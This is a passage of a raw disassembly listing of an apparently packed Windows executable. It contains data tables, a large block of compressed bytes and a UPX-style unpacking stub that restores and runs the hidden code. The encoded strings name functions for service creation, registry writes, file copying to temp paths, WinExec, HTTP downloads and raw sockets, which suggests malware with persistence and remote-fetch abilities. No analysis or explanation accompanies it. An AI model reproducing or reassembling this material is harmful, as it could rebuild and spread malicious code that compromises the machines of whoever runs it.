dd 0A7C0h, 0A7ACh, 0A7D4h, 0
dd 0A93Eh, 0A95Ch, 0A970h, 0A984h, 0A998h, 0A9A8h, 0A914h
dd 0A92Ah, 0
dd 8000000Bh, 80000074h, 8000006Fh, 80000010h, 80000013h
dd 80000004h, 80000009h, 80000017h, 80000003h, 0A9DCh
dd 80000097h, 80000012h, 80000008h, 8000000Eh, 8000000Ch
dd 8000000Ah, 80000001h, 80000014h, 80000011h, 80000033h
dd 80000005h, 8000000Dh, 80000002h, 80000015h, 80000016h
dd 80000073h, 80000034h, 80000039h, 130h dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: code:004029DC�o
; code:00402A20�o ...
dd 1Ch dup(0)
dd 2E52504Dh, 6C6C64h, 2Fh dup(0)
dd 52435000h, 642E3454h, 6C6Ch, 189h dup(0)
dd 0E0h, 38h, 74655301h, 65726854h, 72506461h, 69726F69h
dd 1007974h, 626F6C47h, 654D6C61h, 79726F6Dh, 74617453h
dd 1007375h, 56746547h, 69737265h, 78456E6Fh, 51010041h
dd 79726575h, 66726550h, 616D726Fh, 4365636Eh, 746E756Fh
dd 1007265h, 72657551h, 72655079h, 6D726F66h, 65636E61h
dd 71657246h, 636E6575h, 53010079h, 72457465h, 4D726F72h
dd 65646Fh, 74654701h, 74737953h, 69446D65h, 74636572h
dd 4179726Fh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 6F430100h, 69467970h, 41656Ch, 74654701h
dd 706D6554h, 68746150h, 57010041h, 65746972h, 656C6946h
dd 65470100h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 65530100h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 78450100h, 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 417367h, 65724301h, 45657461h, 746E6576h
dd 57010041h, 46746961h, 6953726Fh, 656C676Eh, 656A624Fh
dd 1007463h, 65656C53h, 47010070h, 69547465h, 6F436B63h
dd 746E75h, 69784501h, 6F725074h, 73736563h, 78450100h
dd 68547469h, 64616572h, 654C0100h, 43657661h, 69746972h
dd 536C6163h, 69746365h, 1006E6Fh, 6D726554h, 74616E69h
dd 72685465h, 646165h, 746E4501h, 72437265h, 63697469h
dd 65536C61h, 6F697463h, 4901006Eh, 6974696Eh, 7A696C61h
dd 69724365h, 61636974h, 6365536Ch, 6E6F6974h, 53646E41h
dd 436E6970h, 746E756Fh, 65440100h, 6574656Ch, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 74654701h, 75646F4Dh
dd 6946656Ch, 614E656Ch, 41656Dh, 6F6C4301h, 61486573h
dd 656C646Eh, 72430100h, 65746165h, 656C6946h, 57010041h
dd 78456E69h, 1006365h, 4C746547h, 45747361h, 726F7272h
dd 72430100h, 65746165h, 6574754Dh, 1004178h, 61657243h
dd 68546574h, 64616572h, 0ED0000h, 0
dd 52010000h, 704F6765h, 654B6E65h, 41784579h, 65520100h
dd 65724367h, 4B657461h, 78457965h, 52010041h, 65536765h
dd 6C615674h, 78456575h, 52010041h, 6C436765h, 4B65736Fh
dd 1007965h, 656C6544h, 65536574h, 63697672h, 4F010065h
dd 536E6570h, 6E614D43h, 72656761h, 4F010041h, 536E6570h
dd 69767265h, 416563h, 6F6C4301h, 65536573h, 63697672h
dd 6E614865h, 656C64h, 61684301h, 5365676Eh, 69767265h
dd 6F436563h, 6769666Eh, 1004132h, 61657243h, 65536574h
dd 63697672h, 1004165h, 53746553h, 69767265h, 74536563h
dd 73757461h, 65520100h, 74736967h, 65537265h, 63697672h
dd 72744365h, 6E61486Ch, 72656C64h, 53010041h, 74726174h
dd 76726553h, 43656369h, 446C7274h, 61707369h, 65686374h
dd 4172h, 0FAh, 0C0h, 72747301h, 746163h, 61727301h, 100646Eh
dd 69727766h, 1006574h, 7274735Fh, 6D63696Eh, 73010070h
dd 68637274h, 73010072h, 6E616373h, 73010066h, 6D637274h
dd 73010070h, 6F747274h, 1006C75h, 65657366h, 6301006Bh
dd 6C6965h, 65726601h, 1006461h, 6F6C6366h, 1006573h, 40333F3Fh
dd 50584159h, 5A405841h, 61720100h, 100646Eh, 69727073h
dd 66746Eh, 6D656D01h, 797063h, 6D656D01h, 746573h, 72747301h
dd 7461636Eh, 74730100h, 79706372h, 6F660100h, 6E6570h
dd 70737601h, 746E6972h, 73010066h, 656C7274h, 6D01006Eh
dd 6F6C6C61h, 72010063h, 6C6C6165h, 100636Fh, 6F74665Fh
dd 5F01006Ch, 65637865h, 685F7470h, 6C646E61h, 337265h
dd 72747301h, 6B6F74h, 74735F01h, 706D6372h, 61010069h
dd 696F74h, 72747301h, 7970636Eh, 74730100h, 72747372h
dd 735F0100h, 6972706Eh, 66746Eh, 65726601h, 5000065h
dd 48000001h, 0FF000001h, 4BFF0018h, 29FF00h, 0FF000BFFh
dd 3FF001Fh, 1100000h, 1640000h, 54010000h, 736E6172h
dd 6574616Ch, 7373654Dh, 656761h, 73694401h, 63746170h
dd 73654D68h, 65676173h, 47010041h, 654D7465h, 67617373h
dd 4165h, 11Bh, 174h, 746E4901h, 656E7265h, 65755174h
dd 61447972h, 76416174h, 616C6961h, 656C62h, 74744801h
dd 6E655370h, 71655264h, 74736575h, 48010041h, 4F707474h
dd 526E6570h, 65757165h, 417473h, 746E4901h, 656E7265h
dd 6E6F4374h, 7463656Eh, 49010041h, 7265746Eh, 4F74656Eh
dd 416E6570h, 6E490100h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h
dd 6F6C4374h, 61486573h, 656C646Eh, 6E490100h, 6E726574h
dd 65527465h, 69466461h, 656Ch, 127h, 198h, 0FF000BFFh
dd 6FFF0074h, 10FF00h, 0FF0013FFh, 9FF0004h, 17FF00h, 10003FFh
dd 53415357h, 656B636Fh, 0FF004174h, 12FF0097h, 8FF00h
dd 0FF000EFFh, 0AFF000Ch, 1FF00h, 0FF0014FFh, 33FF0011h
dd 5FF00h, 0FF000DFFh, 15FF0002h, 16FF00h, 0FF0073FFh
dd 39FF0034h, 0
dd 45500000h, 14C0000h, 0C9950001h, 4331h, 0
dd 0E00000h, 10B010Fh, 9A000006h, 2 dup(0)
dd 916F0000h, 10000000h, 0B0000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 0B0000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0A1300000h, 0A00000h, 14h dup(0)
dd 10000000h, 20C0000h, 6 dup(0)
dd 742E0000h, 747865h, 99F60000h, 10000000h, 9A000000h
dd 4000000h, 3 dup(0)
dd 200000h, 0A000E000h, 0
dd 0A5C60000h, 4BC0000h, 47A716A1h, 0B89291EDh, 7F2529B2h
dd 0B4CCD9B7h, 0B73DB005h, 0C0940F1Dh, 685753C3h, 0B4528347h
dd 69A5083Fh, 228CC2h, 10141DB7h, 47ED3236h, 56267A89h
dd 14F49968h, 642B1A57h, 35189F70h, 0B5C5051Ch, 0FC15E3E0h
dd 1501B376h, 5EC38AD6h, 2D73B65Fh, 469CF612h, 596C4B4Dh
dd 0F3B59881h, 45AA463Eh, 801EEA33h, 10521297h, 5B66DB7h
dd 0EB4907B7h, 5E568603h, 0C3D3D054h, 585F5775h, 4130ECECh
dd 325E2EB3h, 0DA545684h, 1740B7Bh, 5660ECh, 0DC071955h
dd 4B0E9433h, 0F217C65h, 48A839B2h, 8242CD9h, 5F454774h
dd 20E542D0h, 0B6FBE42Dh, 4DF7BC11h, 512B5FE0h, 7D895036h
dd 50A002E8h, 47E46BAEh, 400C3080h, 0E91BB6A1h, 2D47589h
dd 0EE7A04D8h, 9B22AE83h, 6557330Eh, 0F58BE90Dh, 6B7B7C0Ch
dd 0D08BAB29h, 54237850h, 0C7F9BB00h, 0B70A26EDh, 59FC8431h
dd 30D7FF80h, 42C8DF18h, 19FCA8C8h, 7017E87Ch, 17F4DFBBh
dd 750B74BFh, 567A1837h, 16CB3553h, 55B1C673h, 0BB5704FCh
dd 44082A67h, 815E1A6h, 0D8DF2610h, 6E0C1E60h, 176C4FF8h
dd 461645F2h, 0F8F84E00h, 204C873Bh, 4208F8F8h, 0F4E43B31h
dd 0AC7D5ECh, 0C039828h, 0FBE12B01h, 0D32C6083h, 74DB85D8h
dd 56F0BE73h, 789B70D4h, 0A48053A7h, 71105C74h, 0D1211428h
dd 0ED040827h, 6DE3EA12h, 0D8709EFCh, 24256184h, 0A36C30BCh
dd 8B92C88h, 83D8B06Dh, 3B41D999h, 33AD0208h, 3C24B861h
dd 0BE0419EBh, 0D7E27E2Eh, 0B0B153CAh, 350B2068h, 68A9D3Ch
dd 28E83E61h, 27C60E86h, 20C8C3Fh, 1E8C2568h, 34DC05C7h
dd 302CFB9Bh, 1240960h, 91283D89h, 5CD9191h, 0B634302Ch
dd 38B18FDEh, 0C74F2C52h, 0BA825FA3h, 7BEF0ACDh, 49BE651Dh
dd 2CFB4779h, 0D3B28EE1h, 74110057h, 3C9440A3h, 21259C8Bh
dd 82B99404h, 7829D6C2h, 0C6B21F1Fh, 166AD81Fh, 7F7201C0h
dd 7D56BCA4h, 1E80356Fh, 6A25C481h, 67174595h, 6E350CC3h
dd 687034Ah, 0F0B06C3Ah, 0D9A423D3h, 0BDCFD96Ch, 0D0060B25h
dd 2CE256FAh, 30E22713h, 0E4C39E0h, 39897053h, 0EBC200F8h
dd 4C916F7Ch, 0F4073C0Bh, 304D8C39h, 0C2B3CEB4h, 0BD060C31h
dd 50B8445Dh, 450B74D5h, 0E03E79B5h, 0D79A9451h, 708F5059h
dd 60A39A66h, 68FFBF12h, 32D83968h, 0F8107D4Eh, 0F0CA7h
dd 5483A0E7h, 0EA986F02h, 606AC502h, 74025CA8h, 0E30E63Ch
dd 4438B05Bh, 5B0C4056h, 0CF04CF56h, 9B0D6714h, 38102310h
dd 71DBE064h, 2946AF78h, 0D90C13F9h, 0ED23938Bh, 0F70E1068h
dd 3B373612h, 96106CECh, 0AC150650h, 0EE05CCE0h, 0F1878CAh
dd 801C6D64h, 70E236C9h, 828F5FA5h, 0F6AFB109h, 2B2EF084h
dd 6BE6630h, 49C1218Bh, 39AD56B1h, 0F62D99D3h, 101ABB8Dh
dd 0C6540650h, 807BBA36h, 140318BCh, 730C745Ch, 61581539h
dd 0BD610EC1h, 16E490Bh, 2E4F8B1Ch, 0C0875957h, 462DB300h
dd 0D453891Ch, 59F48A25h, 0A3806BCAh, 62066041h, 356080A5h
dd 641F45F8h, 6FC61284h, 0D474C657h, 0C1582950h, 64562709h
dd 0ED90FB72h, 52BA5C64h, 56AD7457h, 0B0668F82h, 0EC9BACA4h
dd 5A02B26h, 78571A9Eh, 198FD037h, 0AF9AA7Eh, 0BF808638h
dd 2BDF63C7h, 0BE803FEBh, 0BF2D758Ah, 5279B636h, 53E83B3Dh
dd 29561D26h, 0C109707Bh, 3AFF7D4Ah, 0EB59F379h, 29535A10h
dd 41A27C0Fh, 0B1C38F5Fh, 0F4244430h, 50688697h, 0D8F7FC57h
dd 0C0FEC01Ah, 0AF420C81h, 20171823h, 72A13557h, 5E9E1483h
dd 33416D52h, 0EB050D54h, 35F44CEAh, 0FE7F15ECh, 481E1842h
dd 18370B8Ch, 35DD97ADh, 4DAE2099h, 9DF54741h, 0A71E7505h
dd 1D1E0892h, 0CAD70C06h, 0C1560DE2h, 0BD1E53A7h, 0B341DA02h
dd 3A3502EBh, 0D4629104h, 21906C40h, 8FA31801h, 0D2A3664Ah
dd 39C4B69Eh, 0FDBED886h, 0FBFFB999h, 3F9F71Ah, 111512D6h
dd 522D4BA0h, 8F1A557Eh, 6C58B47Fh, 3404834Ch, 40CF3117h
dd 0C7A36EC3h, 262D147Ah, 0D021D0C8h, 38AA7BD0h, 1A1A46EAh
dd 0BBCC8071h, 757C1D11h, 640DCE66h, 0D92F6809h, 58088042h
dd 38786F42h, 0CEB444Fh, 0BF584C6Ch, 0A4E0F407h, 0A50A8BDCh
dd 293AF0F5h, 41B75001h, 46B0B1A1h, 0C804D3B2h, 13BC7C4Ah
dd 838A5AC7h, 68F128F1h, 5268D381h, 149806FEh, 5D8373Dh
dd 0DD91A026h, 0BB5980h, 0EA790F12h, 7E6D59B5h, 27401930h
dd 59313D5Fh, 16DC98A7h, 815C0848h, 27B12028h, 0A1A3D2BAh
dd 742F51C8h, 981C8819h, 59A94475h, 65160D81h, 0BB1E0A02h
dd 956E4ECCh, 1FF00E6h, 76120428h, 0CD971BA0h, 0DE658716h
dd 4F6E0C70h, 56423FF7h, 348B60Fh, 1020451h, 24510003h
dd 9317B050h, 49403A10h, 2FBD868Ch, 0AE431CD9h, 226DA3h
dd 0F2A05918h, 0F57D2E9Eh, 4817E2Ah, 76EAA4EBh, 0B6D32A8Bh
dd 4808B4BDh, 0C248C548h, 8032ADC3h, 0FAB07157h, 18A11C2Ah
dd 0B703E0F5h, 6D310F1Bh, 0CE638946h, 0D29BFA8Bh, 0FB611A10h
dd 1B8D2BA5h, 86A068D7h, 9CB352D4h, 5B0742FFh, 3B090AF7h
dd 0CC7781D6h, 0FF810872h, 76F3DB40h, 77C34289h, 526419C2h
dd 8B081C57h, 0B6083554h, 20581DC8h, 6EADF75Bh, 988305ABh
dd 4B6A0673h, 7714580Dh, 0BE690679h, 42471050h, 0E690373Fh
dd 2E32A419h, 419F2126h, 1E1D679Ah, 730A0C19h, 0E6F1164Dh
dd 2BC03305h, 0BAC703C1h, 0A716C918h, 0E255C8A0h, 66C1BE44h
dd 2A4809BAh, 407C8A39h, 7E2F057Fh, 0F006DEDEh, 0FC0B3976h
dd 76F8347Ch, 8CD00A2Dh, 93FC04E0h, 2A17E17Bh, 0EC55CD47h
dd 15E86DDFh, 12241CDDh, 0E94403E3h, 0EBB28504h, 0F768BD0Fh
dd 0D2333E1Fh, 0F1F727B9h, 15180B9h, 0D8F98B0Dh, 0A0DDB85Dh
dd 6A07F7F7h, 0C68B113Ch, 0FB0E1016h, 456EDDD7h, 12C28BD9h
dd 0D81EF3F7h, 0D4BE5914h, 97B93A41h, 0F11358E8h, 0BE054C83h
dd 9B9F0FD0h, 0BAF304BBh, 0BA0E07C8h, 0D01F8C0h, 0B9C8E61Bh
dd 0FB0B9B8h, 41689852h, 8CBBA106h, 9FA8BE0Ah, 704E5608h
dd 5524B509h, 0BC85985Fh, 30201AC6h, 0B59405C7h, 1B3C030Dh
dd 3BD40AEh, 0F516DBCBh, 9A708DC1h, 12210B3Dh, 0A8555B78h
dd 24B80137h, 0FC1CB442h, 67F76192h, 4E750210h, 0EB1220B8h
dd 0B3535E47h, 0B8EF97E7h, 5A3B0B1Ch, 18B83175h, 9EA24B2Fh
dd 4105B5CDh, 1B101F45h, 0E6CF2F7Fh, 0F0C0B48h, 5404B802h
dd 6000B805h, 42AA6C15h, 939F1C60h, 0C1562377h, 0DCB0E051h
dd 628CC841h, 8C64B9h, 6A795E1Ch, 7A105A08h, 0AA3F0092h
dd 0E0F22CBBh, 0E8BA3CC7h, 4A1FB6B9h, 0F16F4045h, 5005F6F7h
dd 0EA942BE9h, 4DC12B10h, 622C832Bh, 841D8C04h, 94D80BD0h
dd 0B5DDD203h, 0ACBE82EAh, 24806EA0h, 2181A423h, 6A9630E7h
dd 9E109315h, 871BE0C2h, 0FF44225Fh, 0B78D0F0Fh, 19C13663h
dd 0E6FA1F30h, 609E3903h, 26BE85BCh, 6C074BB8h, 92775333h
dd 1C186486h, 0D814C01Dh, 9803D684h, 0B84B2699h, 12F6BC18h
dd 0FE837EADh, 0CD317403h, 0EBF16A59h, 0E59B968Ch, 801FEEEh
dd 219EBFEh, 410EBFFh, 6E50B5AEh, 6507EB01h, 6DFB9109h
dd 389803C9h, 0BC9213AAh, 4B75BB65h, 48D9A8Bh, 5D98E08Fh
dd 55F446EFh, 89EB1FF4h, 0D41A9E88h, 0B889EFDEh, 74B00570h
dd 0CACC2691h, 24F0085Dh, 0DEDE47D7h, 8BED7476h, 42C3486h
dd 45F7E7Dh, 7D5A7D0Fh, 45981B77h, 0FFE95726h, 0BE3E68B6h
dd 120C16DBh, 1F0E764Ch
dd 0DBCE6C14h, 596C2321h, 609E8913h, 0C5BBE785h, 749E0EE6h
dd 38B9E80h, 0E02F7809h, 0F188951h, 0F03D1472h, 45C79ADEh
dd 1C78BE5Fh, 0CF5B2807h, 10957457h, 0C60E3A78h, 2BBDFB18h
dd 0FE8147E0h, 0EBDE7C77h, 0C51CBB0Ah, 4F5A184Ah, 0C8C384D1h
dd 8E9EBD6h, 0DA904C43h, 8BC6EE03h, 575F514Eh, 0B1B47049h
dd 22673477h, 1F4F0698h, 0BBA51822h, 6AC23152h, 0EE837014h
dd 479CBE1Ah, 0CC7D2599h, 0B83BECFEh, 6259096Dh, 0C380DA8Bh
dd 5E241D61h, 0CCE8B99h, 17DFEC58h, 0CC15448Ah, 13FB4588h
dd 1C91FC10h, 0FEFD91C9h, 0C9FBAD6Bh, 0FFEF7FFh, 5500FBEh
dd 799A0411h, 0FDFEE79Eh, 47C9FBFCh, 1D95F63Bh, 0BCB075E1h
dd 11B3B88Bh, 0E92431D2h, 7A040B3h, 0EC14C142h, 101A778Dh
dd 98DA11ADh, 0C36C907Eh, 53422816h, 5BDC20FFh, 2010BD98h
dd 92227DDCh, 0F9A45909h, 837ADA71h, 0E0F461C2h, 108BCA6Ch
dd 789417C6h, 0D9DC45FFh, 1996C315h, 798C051Fh, 8145E12Ah
dd 540A09C4h, 8AA9AD9h, 0E9E659C4h, 6DEA6FFCh, 5DB7D23h
dd 9140C62Bh, 0DC0C4DDAh, 0DC0474E2h, 4FC0500Dh, 0E8AF02Bh
dd 130CB881h, 0E8E9FF10h, 12C61519h, 8A0CE44Ch, 0DFF8206h
dd 18A6C7Dh, 2A3C3003h, 0EB414C75h, 0FB118AEDh, 2997FFFFh
dd 74C23A43h, 7C413C1Bh, 7E5A3C04h, 7C613C08h, 7F7A3C0Ah
dd 15203406h, 8406DBE8h, 417E3F30h, 31C4EB46h, 0B7EF41BAh
dd 2A39801Eh, 550179E6h, 80B1EB5Bh, 38E75089h, 0EC1FFB06h
dd 1A8EF133h, 0FFCC163Bh, 55B0425h, 64646464h, 34383C40h
dd 646466B1h, 0CC282C30h, 92F82500h, 240B6Ch, 7DFBC851h
dd 0B7245CEFh, 0E9811472h, 85042D0Bh, 0B161701h, 0EC731FDBh
dd 0C48BC82Bh, 83F8B0Ch, 5F23638Dh, 2075688Bh, 2318051Ch
dd 14232323h, 46000810h, 0FC239E46h, 0F0F4F810h, 4646473Eh
dd 110CE8ECh, 191910E0h, 0D8DC7919h, 191DD0D4h, 0C8CC1919h
dd 8610C0C4h, 0C3875D85h, 0B140653h, 0B87A186Ah, 10BA0F17h
dd 47AD0C0Bh, 2B6E905h, 73EBB91Dh, 54195CC0h, 5FFF8D06h
dd 0D1E9D115h, 0D1EAD1DBh, 0ACC90BD8h, 6DDFBBE9h, 64F71BB7h
dd 1004913Dh, 0E72D103h, 877243Bh, 73BB76DDh, 8762807h
dd 1B10052Bh, 8071411h, 3752FE12h, 76DAF70Ch, 5B00DA83h
dd 343E10C2h, 7FDD7483h, 14188056h, 0EEEC6610h, 78AD88Dh
dd 8041EBD3h, 0C8666D14h, 0F0809E62h, 69BDC839h, 0F7C4FB06h
dd 71083E6h, 4E01760Ch, 0A39ED91Fh, 0F372704Ch, 535657E4h
dd 0EF6B4133h, 147DFF93h, 99955547h, 0A35D6761h, 89132340h
dd 0EF1B1C64h, 18C97330h, 3F18A61Ch, 64C83636h, 19D810A6h
dd 6919C454h, 0EBD17EC6h, 0DBA6D9D1h, 41901CF1h, 14181926h
dd 5087B110h, 22534F62h, 64B15F5Eh, 58846C64h, 5C0554DBh
dd 64630950h, 0C0484C64h, 8041038Dh, 9E00006Ch, 0B2BC95E4h
dd 0A8F24FA7h, 0B900A52Ch, 0E2A90192h, 7257AC2Bh, 0A9EAA9C4h
dd 4264C9C4h, 4C99CF04h, 0C9939326h, 99323264h, 9326264Ch
dd 326464C9h, 264C4C99h, 64C9C993h, 4C999932h, 0C9939326h
dd 99323264h, 9326264Ch, 326464C9h, 264C4C99h, 64C9C993h
dd 4CE79932h, 70609326h, 0A0E639CEh, 4A1040ACh, 0A78223D8h
dd 0CD52504Dh, 4FD9B000h, 52435054h, 0C63454h, 0AB2000h
dd 55D40675h, 7F01A8E0h, 3B44B000h, 72501E54h, 6FFDB869h
dd 74026FB7h, 6C471279h, 6C61626Fh, 0F6D654Dh, 0CDF65379h
dd 13992A3Dh, 72655626h, 0ED052273h, 456EF976h, 75514178h
dd 350790Ch, 17F80036h, 65636E04h, 5D74AC43h, 0ED65754h
dd 65834618h, 6D8F6D54h, 45697908h, 4D177272h, 6B1A80FAh
dd 5653501Bh, 4175BB44h, 6C561AA8h, 2D6C7210h, 583CCDF6h
dd 74616309h, 4679705Ah, 0B6EB1569h, 3341D8DBh, 50703054h
dd 570D6817h, 62C6DDADh, 181965AFh, 69347422h, 35ECAD62h
dd 6E411F41h, 0FB5A0A13h, 9470BBB6h, 766E4564h, 2A39C873h
dd 0DE6D8E68h, 0CDDCF982h, 3431AF0h, 14764524h, 0BDCE615Bh
dd 93466DB9h, 4F421C53h, 51A16A62h, 6ECFB17Bh, 8570650Ah
dd 0F26B6369h, 0C5982952h, 0AD5060A8h, 0B6B6E60Ch, 4C0B4D4Dh
dd 0A3434C05h, 0AAA45A2Bh, 2534C85h, 0AD730E15h, 5417BFD0h
dd 6E452669h, 371D94EEh, 106E4926h, 0C17A690Fh, 41C8EDDAh
dd 7053BE41h, 6E887C40h, 6544DB65h, 0A1647492h, 0C3ED784Dh
dd 4E004503h, 0B0DFE861h, 0D45C1548h, 0EC7E6573h, 0DEF866B1h
dd 0D369EB1Dh, 1C34363Ah, 614CE136h, 4D23A473h, 0C0447839h
dd 0B41E26CBh, 5371ED00h, 52F183D5h, 4BF96765h, 0C0437965h
dd 0E16EF66h, 0F7871028h, 565A3592h, 8820039Bh, 0D5460D1Fh
dd 115BD30h, 0F82AB1D9h, 2C435348h, 650F4172h, 1CB364B3h
dd 0ECC60EBFh, 68DB61DBh, 43146708h, 676966F9h, 9823AB32h
dd 813A965Bh, 0D618CD0Ch, 69860DD1h, 1E3A727Bh, 75E66F55h
dd 736A7753h, 19C06DB7h, 36702A44h, 0F91C6863h, 669C66EBh
dd 79FC0FAh, 6DD63872h, 66069B8Fh, 5F078D77h, 1386E17h
dd 0A48D6798h, 1A726821h, 3E0D66C1h, 0EE170F66h, 15D1B2B6h
dd 4F73339Ch, 0FF69656Bh, 0CF19EF6h, 0E763660Eh, 333F3F07h
dd 58415940h, 0B76B368Eh, 5A400250h, 0AC86630Dh, 0B82E958Bh
dd 6DD04974h, 2B071463h, 5EE66E7Ah, 628C7383h, 0CDB25218h
dd 63B7D50h, 0CE573176h, 316E0AD0h, 6CEA5F89h, 67B5D0ADh
dd 8B665F08h, 86E45F7Dh, 0F09D82EBh, 685F7470h, 9DA53305h
dd 0B37BB65Fh, 9693B5Bh, 6B696F60h, 0DCD0863h, 2002DCFBh
dd 0BAC3656Eh, 0C16D44D6h, 48B30500h, 55021850h, 4BCB2CB0h
dd 801F0B29h, 7178A3AEh, 1036456h, 1E3D306h, 375F6C96h
dd 4360A4EFh, 10651168h, 6D9A7AEDh, 1B390CD8h, 36F44974h
dd 6E2F7B56h, 3144681Ah, 0AD764161h, 0ABAD8FAAh, 480F6249h
dd 0DAF6D98Ch, 52C1B80Ah, 11419C73h, 8F65B0E0h, 433F1147h
dd 0F606F6h, 0E271197h, 364E3ECh, 64652347h, 0E13B6537h
dd 4B0525B2h, 9FBF5214h, 5193B66Bh, 39827A7h, 0B2CB74F7h
dd 96F2C2Ch, 9041310h, 2CCB7E5Bh, 53574417h, 656F5341h
dd 0CB2CB280h, 297FFB6h, 0C0E0812h, 0CB2CB2CBh, 1114010Ah
dd 0CB2C0533h, 20D2CB2h, 5F731615h, 34B2C09Eh, 4550D939h
dd 1014Ch, 0F2197E85h, 4331C995h, 10B010Fh, 5527F506h
dd 6F9A92F0h, 9B0AA91h, 0D7D9C01h, 6D020B40h, 2CDECB73h
dd 1E0C1F07h, 37A3234h, 607103Bh, 0C8406E5Ch, 0A0A130F2h
dd 575D7664h, 1E020CD8h, 774942Eh, 150999F6h, 0EB90C17Ch
dd 15A08504h, 9CE01D87h, 39C6h, 0
db 90h
align 2
dw 0FFh
db 3 dup(0)
; ---------------------------------------------------------------------------
public start
start:
nop
loc_40C620: ; CODE XREF: text:0040C634�j
; text:0040C636�j
popa
mov esi, offset byte_408000
lea edi, [esi-7000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_40C642
; ---------------------------------------------------------------------------
jmp short $+2
jmp short loc_40C620
; ---------------------------------------------------------------------------
jmp short loc_40C620
; ---------------------------------------------------------------------------
loc_40C638: ; CODE XREF: text:loc_40C649�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40C63E: ; CODE XREF: text:0040C6D6�j
; text:0040C6ED�j
add ebx, ebx
jnz short loc_40C649
loc_40C642: ; CODE XREF: text:0040C630�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40C649: ; CODE XREF: text:0040C640�j
jb short loc_40C638
mov eax, 1
loc_40C650: ; CODE XREF: text:0040C65F�j
; text:0040C66A�j
add ebx, ebx
jnz short loc_40C65B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40C65B: ; CODE XREF: text:0040C652�j
adc eax, eax
add ebx, ebx
jnb short loc_40C650
jnz short loc_40C66C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40C650
loc_40C66C: ; CODE XREF: text:0040C661�j
xor ecx, ecx
sub eax, 3
jb short loc_40C680
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_40C6F2
mov ebp, eax
loc_40C680: ; CODE XREF: text:0040C671�j
add ebx, ebx
jnz short loc_40C68B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40C68B: ; CODE XREF: text:0040C682�j
adc ecx, ecx
add ebx, ebx
jnz short loc_40C698
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40C698: ; CODE XREF: text:0040C68F�j
adc ecx, ecx
jnz short loc_40C6BC
inc ecx
loc_40C69D: ; CODE XREF: text:0040C6AC�j
; text:0040C6B7�j
add ebx, ebx
jnz short loc_40C6A8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40C6A8: ; CODE XREF: text:0040C69F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40C69D
jnz short loc_40C6B9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40C69D
loc_40C6B9: ; CODE XREF: text:0040C6AE�j
add ecx, 2
loc_40C6BC: ; CODE XREF: text:0040C69A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40C6DC
loc_40C6CD: ; CODE XREF: text:0040C6D4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40C6CD
jmp loc_40C63E
; ---------------------------------------------------------------------------
align 4
loc_40C6DC: ; CODE XREF: text:0040C6CB�j
; text:0040C6E9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40C6DC
add edi, ecx
jmp loc_40C63E
; ---------------------------------------------------------------------------
loc_40C6F2: ; CODE XREF: text:0040C67C�j
pop esi
mov edi, esi
mov ecx, 2BCh
loc_40C6FA: ; CODE XREF: text:0040C701�j
; text:0040C706�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40C6FF: ; CODE XREF: text:0040C724�j
cmp al, 1
ja short loc_40C6FA
cmp byte ptr [edi], 4
jnz short loc_40C6FA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40C6FF
lea edi, [esi+0A000h]
loc_40C72C: ; CODE XREF: text:0040C74E�j
mov eax, [edi]
or eax, eax
jz short loc_40C777
mov ebx, [edi+4]
lea eax, [eax+esi+0C000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+0C0A0h]
xchg eax, ebp
loc_40C749: ; CODE XREF: text:0040C76F�j
mov al, [edi]
inc edi
or al, al
jz short loc_40C72C
mov ecx, edi
jns short near ptr loc_40C75A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40C75A: ; CODE XREF: text:0040C752�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+0C0A4h]
or eax, eax
jz short loc_40C771
mov [ebx], eax
add ebx, 4
jmp short loc_40C749
; ---------------------------------------------------------------------------
loc_40C771: ; CODE XREF: text:0040C768�j
call dword ptr [esi+0C0A8h]
loc_40C777: ; CODE XREF: text:0040C730�j
pusha
jmp loc_40916F
; ---------------------------------------------------------------------------
align 1000h
text ends
; Section 3. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
rsrc segment para public 'DATA' use32
assume cs:rsrc
;org 40D000h
dd 3 dup(0)
dd 0D0E0h, 0D0A0h, 3 dup(0)
dd 0D0EDh, 0D0B0h, 3 dup(0)
dd 0D0FAh, 0D0B8h, 3 dup(0)
dd 0D105h, 0D0C0h, 3 dup(0)
